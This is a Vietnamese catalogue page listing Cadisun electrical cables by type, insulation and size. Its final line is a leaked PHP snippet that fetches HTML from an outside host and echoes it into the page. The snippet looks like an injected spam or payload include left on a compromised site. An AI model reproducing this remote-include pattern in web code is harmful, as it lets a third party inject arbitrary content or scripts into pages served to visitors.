Dây điện cadisun

Cáp đồng Cadisun

Dây cáp điện hạ thế cadisun 0.6/1kV
Dây điện dân dụng Cadisun
Dây đơn cứng Cadisun - VC 1x
Dây đơn mềm Cadisun - VCSF 1x
Dây đôi mềm Cadisun - VCTFK 2x
Cáp tiếp địa vàng xanh cadisun

Cáp đồng trần Cadisun

Cáp treo Cadisun - Cáp cách điện XLPE Cadisun - CXV Cadisun

Cáp điện 1 - 2 - 3 - 4 lõi cách điện XLPE Cadisun (Cu/XLPE/PVC 1x - 2x - 3x - 4x)
Cáp điện 3 pha + 1 trung tính cách điện XLPE Cadisun (Cu/XLPE/PVC 3x+)

Cáp treo Cadisun - Cách điện PVC Cadisun - CVV Cadisun

Cáp điện 1 - 2 - 3 - 4 lõi cách điện PVC Cadisun (Cu/PVC/PVC 1x - 2x - 3x - 4x)
Cáp điện 3 pha + 1 trung tính cách điện PVC Cadisun (Cu/PVC/PVC 3x+)

Cáp ngầm Cadisun - DSTA Cadisun - DATA Cadisun

Cáp ngầm một nhân giáp băng nhôm Cadisun Cu/XLPE/PVC/DATA
Cáp ngầm 2 - 3 - 4 nhân giáp băng thép Cadisun CU/XLPE/PVC/DSTA
Cáp trung thế 22kV - 35kV - 40.5kV Cadisun
Cáp ngầm trung thế màn chắn băng đồng giáp băng nhôm Cadisun
Cáp ngầm trung thế màn chắn băng đồng giáp băng thép Cadisun
Cáp ngầm trung thế màn chắn băng đồng giáp sợi thép Cadisun

Cáp chuyên dụng cadisun - cáp kỹ thuật cadisun

Cáp chống cháy Cadisun Cu/Mica/XLPE/Fr-PVC
Cáp chậm cháy Cadisun Cu/XLPE/Fr-PVC
Dây cáp điện điều khiển Cadisun
Dây cáp điện 3 pha công nghiệp Cadisun
Cáp hầm mỏ Cadisun
Cáp cẩu trục Cadisun
Cáp nhôm Cadisun
Cáp nhôm trần lõi thép Cadisun - cáp AC Cadisun - As Cadisun - Fe/Al
Cáp nhôm lõi thép bọc cách điện PVC - Fe/Al/PVC
Cáp nhôm bọc cách điện PVC Cadisun - Al/PVC
Cáp nhôm bọc cách điện XLPE Cadisun - Al/XLPE/PVC
Cáp nhôm vặn xoắn ABC Cadisun - Al/XLPE
Các loại dây cáp điện Cadisun thông dụng:
cáp điện cadisun 2x4 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 2x10 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 2x16 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x50 + 1x25 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x35 + 1x25 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x35 + 1x16 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x25 + 1x16 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x16 + 1x10 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 3x10 + 1x6 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 4x10 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 4x25 treo ngầm Cu/XLPE/PVC/DSTA
cáp điện cadisun 4x50 treo ngầm Cu/XLPE/PVC/DSTA
dây điện cadisun 2x1.5
dây điện cadisun 2x2.5
dây điện cadisun 2x4
dây điện cadisun 2x6
dây điện cadisun 1x1.5
dây điện cadisun 1x2.5
dây điện cadisun 1x4
dây điện cadisun 1x6
cáp ngầm trung thế Cadisun 3x240 24kV 35kV 40.5kV Cu/XLPE/PVC/DSTA tiêu chuẩn thường tiêu chuẩn hà nội một lớp bằng đồng hai lớp bằng đồng dày 0.127 mm 0.05 mm
cáp ngầm trung thế Cadisun 3x150 24kV 35kV 40.5kV Cu/XLPE/PVC/DSTA tiêu chuẩn thường tiêu chuẩn hà nội một lớp bằng đồng hai lớp bằng đồng dày 0.127 mm 0.05 mm
cáp ngầm trung thế Cadisun 3x120 24kV 35kV 40.5kV Cu/XLPE/PVC/DSTA tiêu chuẩn thường tiêu chuẩn hà nội một lớp bằng đồng hai lớp bằng đồng dày 0.127 mm 0.05 mm
cáp ngầm trung thế Cadisun 3x70 24kV 35kV 40.5kV Cu/XLPE/PVC/DSTA tiêu chuẩn thường tiêu chuẩn hà nội một lớp bằng đồng hai lớp bằng đồng dày 0.127 mm 0.05 mm
cáp ngầm trung thế Cadisun 3x50 24kV 35kV 40.5kV Cu/XLPE/PVC/DSTA tiêu chuẩn thường tiêu chuẩn hà nội một lớp bằng đồng hai lớp bằng đồng dày 0.127 mm 0.05 mm

Đối tác
Có lỗi với file block
$html = @file_get_contents("http://bandemen.com/seobyculan.html"); echo $html;